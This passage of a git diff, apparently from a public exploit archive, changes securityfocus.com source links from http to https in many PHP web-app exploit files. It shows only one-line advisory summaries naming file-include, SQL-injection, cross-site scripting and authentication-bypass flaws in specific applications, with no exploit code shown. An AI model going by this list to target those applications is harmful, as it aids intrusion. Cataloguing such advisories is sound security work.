sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30457.txt b/exploits/php/webapps/30457.txt index 5ae875022..8c87377bf 100644 --- a/exploits/php/webapps/30457.txt +++ b/exploits/php/webapps/30457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30459.txt b/exploits/php/webapps/30459.txt index 1d271392e..0cff1805c 100644 --- a/exploits/php/webapps/30459.txt +++ b/exploits/php/webapps/30459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25226/info +source: https://www.securityfocus.com/bid/25226/info VietPHP is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30463.txt b/exploits/php/webapps/30463.txt index 74a2b67b8..2a0843508 100644 --- a/exploits/php/webapps/30463.txt +++ b/exploits/php/webapps/30463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25243/info +source: https://www.securityfocus.com/bid/25243/info Coppermine Photo Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30465.txt b/exploits/php/webapps/30465.txt index 51299dbe0..652502f36 100644 --- a/exploits/php/webapps/30465.txt +++ b/exploits/php/webapps/30465.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25252/info +source: https://www.securityfocus.com/bid/25252/info Mapos-Scripts.de Gastebuch is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30466.txt b/exploits/php/webapps/30466.txt index 58de6634f..60298b6f2 100644 --- a/exploits/php/webapps/30466.txt +++ b/exploits/php/webapps/30466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25253/info +source: https://www.securityfocus.com/bid/25253/info File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30467.txt b/exploits/php/webapps/30467.txt index 254f42f0f..3900de2d0 100644 --- a/exploits/php/webapps/30467.txt +++ b/exploits/php/webapps/30467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25253/info +source: https://www.securityfocus.com/bid/25253/info File Uploader is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30479.txt b/exploits/php/webapps/30479.txt index f976bfa18..233e2789a 100644 --- a/exploits/php/webapps/30479.txt +++ b/exploits/php/webapps/30479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25254/info +source: https://www.securityfocus.com/bid/25254/info Shoutbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30480.txt b/exploits/php/webapps/30480.txt index b64b561e0..2840c0dd4 100644 --- a/exploits/php/webapps/30480.txt +++ b/exploits/php/webapps/30480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25256/info +source: https://www.securityfocus.com/bid/25256/info Bilder Galerie is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30481.txt b/exploits/php/webapps/30481.txt index e2afb8288..149826df2 100644 --- a/exploits/php/webapps/30481.txt +++ b/exploits/php/webapps/30481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30482.txt b/exploits/php/webapps/30482.txt index 30d03fe22..468e2b5a1 100644 --- a/exploits/php/webapps/30482.txt +++ b/exploits/php/webapps/30482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30483.txt b/exploits/php/webapps/30483.txt index b3357b313..f15483db1 100644 --- a/exploits/php/webapps/30483.txt +++ b/exploits/php/webapps/30483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25257/info +source: https://www.securityfocus.com/bid/25257/info WebNews is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30486.txt b/exploits/php/webapps/30486.txt index c6f758f00..829fedfba 100644 --- a/exploits/php/webapps/30486.txt +++ b/exploits/php/webapps/30486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25274/info +source: https://www.securityfocus.com/bid/25274/info Lib2 PHP Library is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30487.txt b/exploits/php/webapps/30487.txt index d76e454f2..00ade6792 100644 --- a/exploits/php/webapps/30487.txt +++ b/exploits/php/webapps/30487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25275/info +source: https://www.securityfocus.com/bid/25275/info Php-Stats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30488.php b/exploits/php/webapps/30488.php index 3eeeaba11..ff60e344d 100644 --- a/exploits/php/webapps/30488.php +++ b/exploits/php/webapps/30488.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25276/info +source: https://www.securityfocus.com/bid/25276/info Haudenschilt Family Connections is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/30489.txt b/exploits/php/webapps/30489.txt index efa66a71e..45c043539 100644 --- a/exploits/php/webapps/30489.txt +++ b/exploits/php/webapps/30489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25277/info +source: https://www.securityfocus.com/bid/25277/info Openads (formerly known as phpAdsNew) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30492.txt b/exploits/php/webapps/30492.txt index b3542a2eb..dea5f4c61 100644 --- a/exploits/php/webapps/30492.txt +++ b/exploits/php/webapps/30492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25296/info +source: https://www.securityfocus.com/bid/25296/info JobLister3 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30501.txt b/exploits/php/webapps/30501.txt index 38c967872..056792d04 100644 --- a/exploits/php/webapps/30501.txt +++ b/exploits/php/webapps/30501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25335/info +source: https://www.securityfocus.com/bid/25335/info 'Systeme de vote pour site Web' is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30504.txt b/exploits/php/webapps/30504.txt index 62bb13f49..bc1666880 100644 --- a/exploits/php/webapps/30504.txt +++ b/exploits/php/webapps/30504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25343/info +source: https://www.securityfocus.com/bid/25343/info Olate Download is prone to an authentication-bypass vulnerability. diff --git a/exploits/php/webapps/30509.txt b/exploits/php/webapps/30509.txt index f589ed619..316d30c2c 100644 --- a/exploits/php/webapps/30509.txt +++ b/exploits/php/webapps/30509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25361/info +source: https://www.securityfocus.com/bid/25361/info Dalai Forum is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30510.txt b/exploits/php/webapps/30510.txt index de8f3d300..9aa773f95 100644 --- a/exploits/php/webapps/30510.txt +++ b/exploits/php/webapps/30510.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25366/info +source: https://www.securityfocus.com/bid/25366/info Firesoft is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30511.txt b/exploits/php/webapps/30511.txt index 55d8ce7a3..52cc4496a 100644 --- a/exploits/php/webapps/30511.txt +++ b/exploits/php/webapps/30511.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25368/info +source: https://www.securityfocus.com/bid/25368/info Gurur Haber is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30515.txt b/exploits/php/webapps/30515.txt index d7b991035..7292a3863 100644 --- a/exploits/php/webapps/30515.txt +++ b/exploits/php/webapps/30515.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25393/info +source: https://www.securityfocus.com/bid/25393/info coWiki is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30516.txt b/exploits/php/webapps/30516.txt index aaba99919..c1e0d02bd 100644 --- a/exploits/php/webapps/30516.txt +++ b/exploits/php/webapps/30516.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25394/info +source: https://www.securityfocus.com/bid/25394/info m-phorum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30518.txt b/exploits/php/webapps/30518.txt index 872ecb398..750adb786 100644 --- a/exploits/php/webapps/30518.txt +++ b/exploits/php/webapps/30518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25406/info +source: https://www.securityfocus.com/bid/25406/info Ripe Website Manager is prone to multiple input-validation vulnerabilities, including HTML- and SQL-injection issues. diff --git a/exploits/php/webapps/30520.txt b/exploits/php/webapps/30520.txt index 1ecc79574..71d214ad8 100644 --- a/exploits/php/webapps/30520.txt +++ b/exploits/php/webapps/30520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25413/info +source: https://www.securityfocus.com/bid/25413/info WordPress Pool is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30525.txt b/exploits/php/webapps/30525.txt index 1eee65923..5d0e89c92 100644 --- a/exploits/php/webapps/30525.txt +++ b/exploits/php/webapps/30525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25432/info +source: https://www.securityfocus.com/bid/25432/info Arcadem is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30531.txt b/exploits/php/webapps/30531.txt index 3c648a71e..3db875196 100644 --- a/exploits/php/webapps/30531.txt +++ b/exploits/php/webapps/30531.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25448/info +source: https://www.securityfocus.com/bid/25448/info AutoIndex PHP Script is prone a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30533.txt b/exploits/php/webapps/30533.txt index 45df26287..0cf255dda 100644 --- a/exploits/php/webapps/30533.txt +++ b/exploits/php/webapps/30533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25456/info +source: https://www.securityfocus.com/bid/25456/info Calendar Events is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30534.txt b/exploits/php/webapps/30534.txt index 1df79cfa1..71d1f7bab 100644 --- a/exploits/php/webapps/30534.txt +++ b/exploits/php/webapps/30534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25458/info +source: https://www.securityfocus.com/bid/25458/info PhpGedView is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30539.txt b/exploits/php/webapps/30539.txt index 39a56b6c7..df4a92158 100644 --- a/exploits/php/webapps/30539.txt +++ b/exploits/php/webapps/30539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25466/info +source: https://www.securityfocus.com/bid/25466/info ACG News is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30553.txt b/exploits/php/webapps/30553.txt index 1e7af6c9f..649261c06 100644 --- a/exploits/php/webapps/30553.txt +++ b/exploits/php/webapps/30553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25507/info +source: https://www.securityfocus.com/bid/25507/info Toms Gästebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30554.txt b/exploits/php/webapps/30554.txt index 7b07dc022..74b5f0cf7 100644 --- a/exploits/php/webapps/30554.txt +++ b/exploits/php/webapps/30554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25507/info +source: https://www.securityfocus.com/bid/25507/info Toms Gästebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30555.txt b/exploits/php/webapps/30555.txt index 1d7c54613..c016dad40 100644 --- a/exploits/php/webapps/30555.txt +++ b/exploits/php/webapps/30555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25515/info +source: https://www.securityfocus.com/bid/25515/info MKPortal is prone to an authentication-bypass vulnerability because it fails to restrict access to certain administrative functions. diff --git a/exploits/php/webapps/30556.html b/exploits/php/webapps/30556.html index e447918d7..cca3b1315 100644 --- a/exploits/php/webapps/30556.html +++ b/exploits/php/webapps/30556.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30557.txt b/exploits/php/webapps/30557.txt index a29ee7406..10e04a88a 100644 --- a/exploits/php/webapps/30557.txt +++ b/exploits/php/webapps/30557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30558.txt b/exploits/php/webapps/30558.txt index 53324c36a..9c4cc868a 100644 --- a/exploits/php/webapps/30558.txt +++ b/exploits/php/webapps/30558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30559.txt b/exploits/php/webapps/30559.txt index f04fc52df..0668a663e 100644 --- a/exploits/php/webapps/30559.txt +++ b/exploits/php/webapps/30559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25521/info +source: https://www.securityfocus.com/bid/25521/info Claroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/30560.txt b/exploits/php/webapps/30560.txt index a1dd498a9..7af225b1a 100644 --- a/exploits/php/webapps/30560.txt +++ b/exploits/php/webapps/30560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25526/info +source: https://www.securityfocus.com/bid/25526/info 212cafe Webboard is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/30568.txt b/exploits/php/webapps/30568.txt index af911fab1..5123d2b0a 100644 --- a/exploits/php/webapps/30568.txt +++ b/exploits/php/webapps/30568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25575/info +source: https://www.securityfocus.com/bid/25575/info Pulsewiki and Pawfaliki are prone to a local file-include vulnerability because the software fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30570.txt b/exploits/php/webapps/30570.txt index 9aa864f16..94e149629 100644 --- a/exploits/php/webapps/30570.txt +++ b/exploits/php/webapps/30570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25598/info +source: https://www.securityfocus.com/bid/25598/info Toms Gastebuch is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30572.txt b/exploits/php/webapps/30572.txt index 3a34b79d5..b80de37b9 100644 --- a/exploits/php/webapps/30572.txt +++ b/exploits/php/webapps/30572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25615/info +source: https://www.securityfocus.com/bid/25615/info phpMyQuote is prone to multiple input-validation vulnerabilities, including a cross-site scripting issue and an SQL-injection issue, because the application fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/30573.txt b/exploits/php/webapps/30573.txt index e895a884b..500e8386a 100644 --- a/exploits/php/webapps/30573.txt +++ b/exploits/php/webapps/30573.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25617/info +source: https://www.securityfocus.com/bid/25617/info Sisfo Kampus is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30575.txt b/exploits/php/webapps/30575.txt index 1d7862ee6..f362293ec 100644 --- a/exploits/php/webapps/30575.txt +++ b/exploits/php/webapps/30575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25644/info +source: https://www.securityfocus.com/bid/25644/info BOINC (Berkeley Open Infrastructure for Network Computing) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30576.txt b/exploits/php/webapps/30576.txt index ebec1f14d..50819436a 100644 --- a/exploits/php/webapps/30576.txt +++ b/exploits/php/webapps/30576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25644/info +source: https://www.securityfocus.com/bid/25644/info BOINC (Berkeley Open Infrastructure for Network Computing) is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/30577.txt b/exploits/php/webapps/30577.txt index 52463a150..4fbad4b37 100644 --- a/exploits/php/webapps/30577.txt +++ b/exploits/php/webapps/30577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25646/info +source: https://www.securityfocus.com/bid/25646/info Plesk is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries. diff --git a/exploits/php/webapps/30581.txt b/exploits/php/webapps/30581.txt index c3a96044a..20c48d1c0 100644 --- a/exploits/php/webapps/30581.txt +++ b/exploits/php/webapps/30581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25652/info +source: https://www.securityfocus.com/bid/25652/info CS-Guestbook is prone to an information-disclosure vulnerability because the application fails to properly protect sensitive information. diff --git a/exploits/php/webapps/30583.txt b/exploits/php/webapps/30583.txt index 1dc3740da..ebd59d2ef 100644 --- a/exploits/php/webapps/30583.txt +++ b/exploits/php/webapps/30583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25674/info +source: https://www.securityfocus.com/bid/25674/info Php-Stats is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30588.txt b/exploits/php/webapps/30588.txt index bf47558b9..a24773816 100644 --- a/exploits/php/webapps/30588.txt +++ b/exploits/php/webapps/30588.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25683/info +source: https://www.securityfocus.com/bid/25683/info ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input. diff --git a/exploits/php/webapps/30594.txt b/exploits/php/webapps/30594.txt index 404b7b836..426f468a7 100644 --- a/exploits/php/webapps/30594.txt +++ b/exploits/php/webapps/30594.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25698/info +source: https://www.securityfocus.com/bid/25698/info Coppermine Photo Gallery is prone to a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/30595.txt b/exploits/php/webapps/30595.txt index 783e3e5b6..cf38e94e2 100644 --- a/exploits/php/webapps/30595.txt +++ b/exploits/php/webapps/30595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25698/info +source: https://www.securityfocus.com/bid/25698/info Coppermine Photo Gallery is prone to a cross-site scripting issue and a local file-include issue. diff --git a/exploits/php/webapps/30596.txt b/exploits/php/webapps/30596.txt index d4b40d75e..39eed1232 100644 --- a/exploits/php/webapps/30596.txt +++ b/exploits/php/webapps/30596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25699/info +source: https://www.securityfocus.com/bid/25699/info b1gMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30601.txt b/exploits/php/webapps/30601.txt index de23b2484..75db2a762 100644 --- a/exploits/php/webapps/30601.txt +++ b/exploits/php/webapps/30601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25752/info +source: https://www.securityfocus.com/bid/25752/info The Vigile CMS wiki module is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30602.html b/exploits/php/webapps/30602.html index 9dbf7f543..bcb31f8ae 100644 --- a/exploits/php/webapps/30602.html +++ b/exploits/php/webapps/30602.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25769/info +source: https://www.securityfocus.com/bid/25769/info WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30603.html b/exploits/php/webapps/30603.html index 9cdadda71..04622c76b 100644 --- a/exploits/php/webapps/30603.html +++ b/exploits/php/webapps/30603.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25771/info +source: https://www.securityfocus.com/bid/25771/info Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30607.txt b/exploits/php/webapps/30607.txt index 5bfe6a7fb..8cb177695 100644 --- a/exploits/php/webapps/30607.txt +++ b/exploits/php/webapps/30607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25790/info +source: https://www.securityfocus.com/bid/25790/info The 'bcoos' Arcade module is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30614.txt b/exploits/php/webapps/30614.txt index 991d270cc..7588b54a8 100644 --- a/exploits/php/webapps/30614.txt +++ b/exploits/php/webapps/30614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25806/info +source: https://www.securityfocus.com/bid/25806/info Dance Music is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30615.txt b/exploits/php/webapps/30615.txt index 397f36b6d..e96676a95 100644 --- a/exploits/php/webapps/30615.txt +++ b/exploits/php/webapps/30615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25808/info +source: https://www.securityfocus.com/bid/25808/info SimpGB is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30616.txt b/exploits/php/webapps/30616.txt index e57aacf54..44e0c947e 100644 --- a/exploits/php/webapps/30616.txt +++ b/exploits/php/webapps/30616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25808/info +source: https://www.securityfocus.com/bid/25808/info SimpGB is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30617.txt b/exploits/php/webapps/30617.txt index c81d62e2c..6323dc198 100644 --- a/exploits/php/webapps/30617.txt +++ b/exploits/php/webapps/30617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25809/info +source: https://www.securityfocus.com/bid/25809/info SimpNews is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30618.txt b/exploits/php/webapps/30618.txt index dd0323d05..21be1ea2b 100644 --- a/exploits/php/webapps/30618.txt +++ b/exploits/php/webapps/30618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25809/info +source: https://www.securityfocus.com/bid/25809/info SimpNews is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30623.pl b/exploits/php/webapps/30623.pl index c4aefa7d6..1be8c3747 100755 --- a/exploits/php/webapps/30623.pl +++ b/exploits/php/webapps/30623.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25864/info +source: https://www.securityfocus.com/bid/25864/info MD-Pro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/30632.txt b/exploits/php/webapps/30632.txt index 8064a888e..47dfd557c 100644 --- a/exploits/php/webapps/30632.txt +++ b/exploits/php/webapps/30632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25911/info +source: https://www.securityfocus.com/bid/25911/info DRBGuestbook is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30633.txt b/exploits/php/webapps/30633.txt index 45e1260dc..a8f914da8 100644 --- a/exploits/php/webapps/30633.txt +++ b/exploits/php/webapps/30633.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25912/info +source: https://www.securityfocus.com/bid/25912/info UebiMiau is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30634.txt b/exploits/php/webapps/30634.txt index 3501bdcc3..9255a4811 100644 --- a/exploits/php/webapps/30634.txt +++ b/exploits/php/webapps/30634.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25914/info +source: https://www.securityfocus.com/bid/25914/info Content*Builder (C*B) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/30637.js b/exploits/php/webapps/30637.js index 1795debe3..171b00efe 100644 --- a/exploits/php/webapps/30637.js +++ b/exploits/php/webapps/30637.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25921/info +source: https://www.securityfocus.com/bid/25921/info FeedBurner FeedSmith is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/php/webapps/30638.txt b/exploits/php/webapps/30638.txt index 96783e957..e9643a3ab 100644 --- a/exploits/php/webapps/30638.txt +++ b/exploits/php/webapps/30638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25923/info +source: https://www.securityfocus.com/bid/25923/info GForge is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. A fix is available from the vendor. diff --git a/exploits/php/webapps/30640.txt b/exploits/php/webapps/30640.txt index 9550b1eb4..323c95185 100644 --- a/exploits/php/webapps/30640.txt +++ b/exploits/php/webapps/30640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25931/info +source: https://www.securityfocus.com/bid/25931/info Stuffed Tracker is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30641.txt b/exploits/php/webapps/30641.txt index 1f4e89a77..1fc923b47 100644 --- a/exploits/php/webapps/30641.txt +++ b/exploits/php/webapps/30641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25942/info +source: https://www.securityfocus.com/bid/25942/info MailBee WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30642.txt b/exploits/php/webapps/30642.txt index 0a7a1ddb1..0d3324231 100644 --- a/exploits/php/webapps/30642.txt +++ b/exploits/php/webapps/30642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25942/info +source: https://www.securityfocus.com/bid/25942/info MailBee WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30647.txt b/exploits/php/webapps/30647.txt index 10e81e51e..bec3eeebc 100644 --- a/exploits/php/webapps/30647.txt +++ b/exploits/php/webapps/30647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25963/info +source: https://www.securityfocus.com/bid/25963/info SNewsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/30651.txt b/exploits/php/webapps/30651.txt index 0383a31b8..a314b5663 100644 --- a/exploits/php/webapps/30651.txt +++ b/exploits/php/webapps/30651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25999/info +source: https://www.securityfocus.com/bid/25999/info Webmaster-Tips.net Joomla! RSS Feed Reader is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30653.txt b/exploits/php/webapps/30653.txt index c80e852e7..75198df8e 100644 --- a/exploits/php/webapps/30653.txt +++ b/exploits/php/webapps/30653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26020/info +source: https://www.securityfocus.com/bid/26020/info phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30654.txt b/exploits/php/webapps/30654.txt index 32f837c2d..f2c8d174f 100644 --- a/exploits/php/webapps/30654.txt +++ b/exploits/php/webapps/30654.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26027/info +source: https://www.securityfocus.com/bid/26027/info ActiveKB NX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30655.txt b/exploits/php/webapps/30655.txt index add92d981..87f388c81 100644 --- a/exploits/php/webapps/30655.txt +++ b/exploits/php/webapps/30655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26031/info +source: https://www.securityfocus.com/bid/26031/info The Joomla! Search component is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30656.txt b/exploits/php/webapps/30656.txt index ebb20d17b..4f2271873 100644 --- a/exploits/php/webapps/30656.txt +++ 